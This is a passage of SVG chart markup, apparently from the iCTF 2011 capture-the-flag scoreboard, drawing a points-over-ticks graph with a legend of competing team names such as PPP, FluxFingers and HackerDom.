stroke-width="0.000001"></path><path d="M 158 241.32 L 154 233.32 162 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 156.5 241.32 L 152.5 233.32 160.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 155 241.32 L 151 233.32 159 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 153.5 241.32 L 149.5 233.32 157.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 152 241.32 L 148 233.32 156 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 150.5 241.32 L 146.5 233.32 154.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 149 241.32 L 145 233.32 153 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 147.5 241.32 L 143.5 233.32 151.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 146 241.32 L 142 233.32 150 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 144.5 241.32 L 140.5 233.32 148.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 143 241.32 L 139 233.32 147 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 141.5 241.32 L 137.5 233.32 145.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 140 241.32 L 136 233.32 144 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 241.32 L 134.5 233.32 142.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 137 241.32 L 133 233.32 141 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 135.5 241.32 L 131.5 233.32 139.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 134 241.32 L 130 233.32 138 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 241.32 L 128.5 233.32 136.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 241.32 L 126.5 233.32 134.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 129 241.32 L 125 233.32 133 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 127.5 241.32 L 123.5 233.32 131.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 126 241.32 L 122 233.32 130 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 241.32 L 120.5 233.32 128.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 123 241.32 L 119 233.32 127 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 121.5 241.82 L 117.5 233.82 125.5 233.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 120 241.82 L 116 233.82 124 233.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 241.82 L 114.5 233.82 122.5 233.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 117 242.32 L 113 234.32 121 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 115.5 242.32 L 111.5 234.32 119.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 114 242.32 L 110 234.32 118 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 242.32 L 108.5 234.32 116.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 111 242.32 L 107 234.32 115 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 109.5 242.32 L 105.5 234.32 113.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 108 242.32 L 104 234.32 112 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 242.32 L 102.5 234.32 110.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 105 242.32 L 101 234.32 109 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 103 242.32 L 99 234.32 107 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 101.5 242.32 L 97.5 234.32 105.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 100 242.32 L 96 234.32 104 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 242.32 L 94.5 234.32 102.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 97 242.32 L 93 234.32 101 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 95.5 242.32 L 91.5 234.32 99.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 94 242.32 L 90 234.32 98 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 92.5 242.32 L 88.5 234.32 96.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 91 242.32 L 87 234.32 95 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 89.5 242.32 L 85.5 234.32 93.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 88 242.32 L 84 234.32 92 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 86.5 242.32 L 82.5 234.32 90.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 85 242.32 L 81 234.32 89 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 83.5 242.32 L 79.5 234.32 87.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 82 242.32 L 78 234.32 86 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 80.5 242.32 L 76.5 234.32 84.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 79 242.32 L 75 234.32 83 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 77.5 242.32 L 73.5 234.32 81.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 75.5 242.32 L 71.5 234.32 79.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 74 242.32 L 70 234.32 78 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 72.5 242.32 L 68.5 234.32 76.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 71 242.32 L 67 234.32 75 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 69.5 242.32 L 65.5 234.32 73.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 68 242.32 L 64 234.32 72 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 66.5 242.32 L 62.5 234.32 70.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 65 242.32 L 61 234.32 69 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 63.5 242.32 L 59.5 234.32 67.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 62 242.32 L 58 234.32 66 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 60.5 242.32 L 56.5 234.32 64.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 59 242.32 L 55 234.32 63 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 242.32 L 53.5 234.32 61.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 56 242.32 L 52 234.32 60 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 54.5 242.32 L 50.5 234.32 58.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 53 242.32 L 49 234.32 57 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 242.32 L 47.5 234.32 55.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 50 242.32 L 46 234.32 54 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 48 242.32 L 44 234.32 52 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 46.5 242.32 L 42.5 234.32 50.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 45 242.32 L 41 234.32 49 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 242.32 L 39.5 234.32 47.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 42 242.32 L 38 234.32 46 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 40.5 242.32 L 36.5 234.32 44.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 39 242.32 L 35 234.32 43 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 242.32 L 33.5 234.32 41.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 36 242.32 L 32 234.32 40 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 34.5 242.32 L 30.5 234.32 38.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 33 242.32 L 29 234.32 37 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 242.32 L 27.5 234.32 35.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 30 242.32 L 26 234.32 34 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 28.5 242.32 L 24.5 234.32 32.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 27 242.32 L 23 234.32 31 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 242.32 L 21.5 234.32 29.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 24 242.32 L 20 234.32 28 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 22 242.32 L 18 234.32 26 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 20.5 242.32 L 16.5 234.32 24.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 19 242.32 L 15 234.32 23 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 242.32 L 13.5 234.32 21.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 16 242.32 L 12 234.32 20 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 14.5 242.32 L 10.5 234.32 18.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 13 242.32 L 9 234.32 17 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 11.5 242.32 L 7.5 234.32 15.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 10 242.32 L 6 234.32 14 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 8.5 242.32 L 4.5 234.32 12.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 7 242.32 L 3 234.32 11 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 5.5 242.32 L 1.5 234.32 9.5 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 4 242.32 L 0 234.32 8 234.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path></g></g><g class="highcharts-legend" zIndex="7" transform="translate(484,110)"><text x="30" y="18" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">We_0wn_Y0u</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#DDDF0D" transform="translate(30,14)"></path><text x="30" y="33" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">More Smoked Leet Chicken</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#7798BF" transform="translate(30,29)"></path><text x="30" y="48" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">FluxFingers</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#55BF3B" transform="translate(30,44)"></path><text x="30" y="63" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">PPP</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#DF5353" transform="translate(30,59)"></path><text x="30" y="78" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">CISSP Groupies</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#aaeeee" transform="translate(30,74)"></path><text x="30" y="93" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">ENOFLAG</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#ff0066" transform="translate(30,89)"></path><text x="30" y="108" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">Pwnies</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#eeaaee" transform="translate(30,104)"></path><text x="30" y="123" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">PeterPEN</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#55BF3B" transform="translate(30,119)"></path><text x="30" y="138" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">FAUST</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#DF5353" transform="translate(30,134)"></path><text x="30" y="153" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;cursor:pointer;color:#CCC;fill:#CCC;" zIndex="2"><tspan x="30">HackerDom</tspan></text><path d="M -21 0 L -5 0" fill="none" stroke-width="2" zIndex="2" stroke="#7798BF" transform="translate(30,149)"></path><circle cx="17" cy="14" r="4" zIndex="3" stroke="#333" stroke-width="0.000001" fill="#DDDF0D"></circle><path d="M 17 25 L 21 29 17 33 13 29 Z" fill="#7798BF" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 14.172 41.172 L 19.828 41.172 19.828 46.828 14.172 46.828 Z" fill="#55BF3B" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 53.68 L 21 61.68 13 61.68 Z" fill="#DF5353" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 79.32 L 13 71.32 21 71.32 Z" fill="#aaeeee" zIndex="3" stroke="#333" stroke-width="0.000001"></path><circle cx="17" cy="89" r="4" zIndex="3" stroke="#333" stroke-width="0.000001" fill="#ff0066"></circle><path d="M 17 100 L 21 104 17 108 13 104 Z" fill="#eeaaee" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 14.172 116.172 L 19.828 116.172 19.828 121.828 14.172 121.828 Z" fill="#55BF3B" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 128.68 L 21 136.68 13 136.68 Z" fill="#DF5353" zIndex="3" stroke="#333" stroke-width="0.000001"></path><path d="M 17 154.32 L 13 146.32 21 146.32 Z" fill="#7798BF" zIndex="3" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-axis" zIndex="7"><text x="78.91176470588235" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="78.91176470588235">0</tspan></text><text x="155.31341911764707" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="155.31341911764707">50</tspan></text><text x="231.71507352941177" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="231.71507352941177">100</tspan></text><text x="308.11672794117646" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="308.11672794117646">150</tspan></text><text x="384.51838235294116" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="384.51838235294116">200</tspan></text><text x="460.9200367647059" y="365" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="middle"><tspan x="460.9200367647059">250</tspan></text><path d="M 79.5 351 L 79.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 155.5 351 L 155.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 232.5 351 L 232.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 308.5 351 L 308.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 385.5 351 L 385.5 356" fill="none" stroke="#999" stroke-width="1"></path><path d="M 461.5 351 L 461.5 356" fill="none" stroke="#999" stroke-width="1"></path></g><text x="274.5" y="382" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#AAA;font-weight:bold;font:bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#AAA;" zIndex="7" text-anchor="middle"><tspan x="274.5">Ticks</tspan></text><g class="highcharts-axis" zIndex="7"><text x="67" y="356.6" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">-500</tspan></text><text x="67" y="297.40000000000003" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">0</tspan></text><text x="67" y="238.20000000000002" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">500</tspan></text><text x="67" y="179" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">1,000</tspan></text><text x="67" y="119.79999999999998" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">1,500</tspan></text><text x="67" y="60.6" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:11px;width:304px;color:#999;line-height:14px;font-weight:bold;fill:#999;" text-anchor="end"><tspan x="67">2,000</tspan></text></g><text x="25" y="203" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#AAA;font-weight:bold;font:bold 12px Lucida Grande, Lucida Sans Unicode, Verdana, Arial, Helvetica, sans-serif;fill:#AAA;" zIndex="7" transform="rotate(270 25 203)" text-anchor="middle"><tspan x="25">Points</tspan></text><path d="M 75 351.5 L 474 351.5" fill="none" stroke="#999" stroke-width="1" zIndex="7"></path><g class="highcharts-tooltip" zIndex="8" visibility="hidden"><rect rx="5" ry="5" fill="none" x="5" y="5" width="0" height="0" stroke-width="5" isShadow="true" stroke="rgb(0, 0, 0)" stroke-opacity="0.05" transform="translate(1,1)"></rect><rect rx="5" ry="5" fill="none" x="5" y="5" width="0" height="0" stroke-width="3" isShadow="true" stroke="rgb(0, 0, 0)" stroke-opacity="0.1" transform="translate(1,1)"></rect><rect rx="5" ry="5" fill="none" x="5" y="5" width="0" height="0" stroke-width="1" isShadow="true" stroke="rgb(0, 0, 0)" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></rect><rect rx="5" ry="5" fill="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1576)" x="5" y="5" width="0" height="0" stroke-width="0.000001"></rect><text x="10" y="22" style="font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif;font-size:12px;color:#FFF;padding:0;white-space:nowrap;fill:#FFF;" zIndex="1"><tspan x="10"> </tspan></text></g><g class="highcharts-tracker" zIndex="9" transform="translate(75,55)"><path d="M -6.088235294117647 236.8 L 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.315152 L 69.6171875 235.82508256 L 71.1452205882353 231.74880736 L 72.6732536764706 231.19469536 L 74.20128676470588 231.19469536 L 75.72931985294119 231.19469536 L 77.25735294117648 231.19469536 L 78.78538602941177 231.19469536 L 80.31341911764706 231.19469536 L 81.84145220588236 231.19469536 L 83.36948529411765 231.19469536 L 84.89751838235294 231.19469536 L 86.42555147058825 229.45687936000002 L 87.95358455882354 228.74346015999998 L 89.48161764705883 226.60671904 L 91.00965073529413 225.14897824 L 92.53768382352942 224.13058432 L 94.06571691176471 223.70690176 L 95.59375 223.70690176 L 97.1217830882353 223.70690176 L 98.6498161764706 223.70690176 L 100.17784926470588 223.70690176 L 101.70588235294119 223.70690176 L 103.23391544117648 223.70690176 L 104.76194852941177 223.70690176 L 106.28998161764706 223.70690176 L 107.81801470588236 223.70690176 L 109.34604779411765 223.70690176 L 110.87408088235294 223.70690176 L 112.40211397058825 223.70690176 L 113.93014705882354 223.09276096000002 L 115.45818014705883 222.473896 L 116.98621323529413 221.94209056 L 118.51424632352942 221.94209056 L 120.04227941176471 221.854146592 L 121.5703125 221.854146592 L 123.0983455882353 221.77502934400002 L 124.6263786764706 221.77502934400002 L 126.15441176470588 221.77502934400002 L 127.68244485294119 221.77502934400002 L 129.21047794117646 221.77502934400002 L 130.73851102941177 221.598210784 L 132.26654411764707 221.44181425066625 L 133.79457720588235 221.44181425066625 L 135.32261029411765 221.36100625066626 L 136.85064338235296 221.36100625066626 L 138.37867647058823 221.36100625066626 L 139.90670955882354 221.36100625066626 L 141.43474264705884 221.36100625066626 L 142.96277573529412 221.36100625066626 L 144.49080882352942 221.36100625066626 L 146.01884191176472 221.36100625066626 L 147.546875 221.36100625066626 L 149.0749080882353 221.36100625066626 L 150.6029411764706 221.36100625066626 L 152.13097426470588 218.66954929066628 L 153.6590073529412 217.97563057066628 L 155.18704044117646 217.97563057066628 L 156.71507352941177 214.99860465066627 L 158.24310661764707 209.52447537066627 L 159.77113970588235 209.52447537066627 L 161.29917279411765 209.52447537066627 L 162.82720588235296 209.52447537066627 L 164.35523897058823 209.52447537066627 L 165.88327205882354 209.52447537066627 L 167.41130514705884 209.52447537066627 L 168.93933823529412 209.52447537066627 L 170.46737132352942 206.15682417066625 L 171.99540441176472 206.15682417066625 L 173.5234375 206.15682417066625 L 175.0514705882353 206.15682417066625 L 176.5795036764706 206.15682417066625 L 178.10753676470588 204.93529137066628 L 179.6355698529412 204.93529137066628 L 181.1636029411765 204.93529137066628 L 182.69163602941177 204.93529137066628 L 184.21966911764707 204.93529137066628 L 185.74770220588235 204.93529137066628 L 187.27573529411765 199.23997905066625 L 188.80376838235296 190.51914417066627 L 190.33180147058823 181.13458257066625 L 191.85983455882354 177.58471377066627 L 193.38786764705884 177.58471377066627 L 194.91590073529412 171.20709777066625 L 196.44393382352942 171.20709777066625 L 197.97196691176472 171.20709777066625 L 199.5 171.20709777066625 L 201.0280330882353 171.20709777066625 L 202.5560661764706 171.20709777066625 L 204.08409926470588 171.20709777066625 L 205.6121323529412 171.20709777066625 L 207.1401654411765 171.20709777066625 L 208.66819852941177 171.20709777066625 L 210.19623161764707 171.20709777066625 L 211.72426470588235 170.8553195306663 L 213.25229779411765 170.8553195306663 L 214.78033088235296 170.8553195306663 L 216.30836397058823 170.8553195306663 L 217.83639705882354 170.8553195306663 L 219.36443014705884 170.8553195306663 L 220.89246323529412 170.8553195306663 L 222.42049632352942 170.8553195306663 L 223.94852941176472 170.8553195306663 L 225.4765625 170.8553195306663 L 227.0045955882353 170.8553195306663 L 228.5326286764706 170.8553195306663 L 230.06066176470588 170.8553195306663 L 231.5886948529412 170.8553195306663 L 233.1167279411765 170.8553195306663 L 234.64476102941177 170.8553195306663 L 236.17279411764707 169.9668932906663 L 237.70082720588238 169.9668932906663 L 239.22886029411765 169.9668932906663 L 240.75689338235296 169.9668932906663 L 242.28492647058823 169.9668932906663 L 243.81295955882354 169.9668932906663 L 245.34099264705884 169.9668932906663 L 246.86902573529412 169.9668932906663 L 248.39705882352942 169.9668932906663 L 249.92509191176472 169.9668932906663 L 251.453125 169.9668932906663 L 252.9811580882353 169.9668932906663 L 254.5091911764706 169.9668932906663 L 256.0372242647059 169.9668932906663 L 257.56525735294116 169.9668932906663 L 259.09329044117646 169.9668932906663 L 260.62132352941177 169.9668932906663 L 262.1493566176471 169.9668932906663 L 263.6773897058824 169.9668932906663 L 265.2054227941177 169.93208369066627 L 266.7334558823529 169.93208369066627 L 268.26148897058823 169.93208369066627 L 269.78952205882354 169.93208369066627 L 271.31755514705884 169.93208369066627 L 272.84558823529414 169.93208369066627 L 274.37362132352945 169.93208369066627 L 275.9016544117647 169.93208369066627 L 277.4296875 169.93208369066627 L 278.9577205882353 169.93208369066627 L 280.4857536764706 169.93208369066627 L 282.0137867647059 169.93208369066627 L 283.54181985294116 169.93208369066627 L 285.06985294117646 169.93208369066627 L 286.59788602941177 169.93208369066627 L 288.1259191176471 169.93208369066627 L 289.6539522058824 169.93208369066627 L 291.1819852941177 169.93208369066627 L 292.7100183823529 169.93208369066627 L 294.23805147058823 169.93208369066627 L 295.76608455882354 169.93208369066627 L 297.29411764705884 169.93208369066627 L 298.82215073529414 169.93208369066627 L 300.35018382352945 169.93208369066627 L 301.8782169117647 169.93208369066627 L 303.40625 163.11984497066626 L 304.9342830882353 151.89524081066628 L 306.4623161764706 151.89524081066628 L 307.9903492647059 151.89524081066628 L 309.51838235294116 151.89524081066628 L 311.04641544117646 151.89524081066628 L 312.57444852941177 151.89524081066628 L 314.1024816176471 151.89524081066628 L 315.6305147058824 143.18861393066626 L 317.1585477941177 143.18861393066626 L 318.6865808823529 143.18861393066626 L 320.21461397058823 143.18861393066626 L 321.74264705882354 143.18861393066626 L 323.27068014705884 123.14467793066623 L 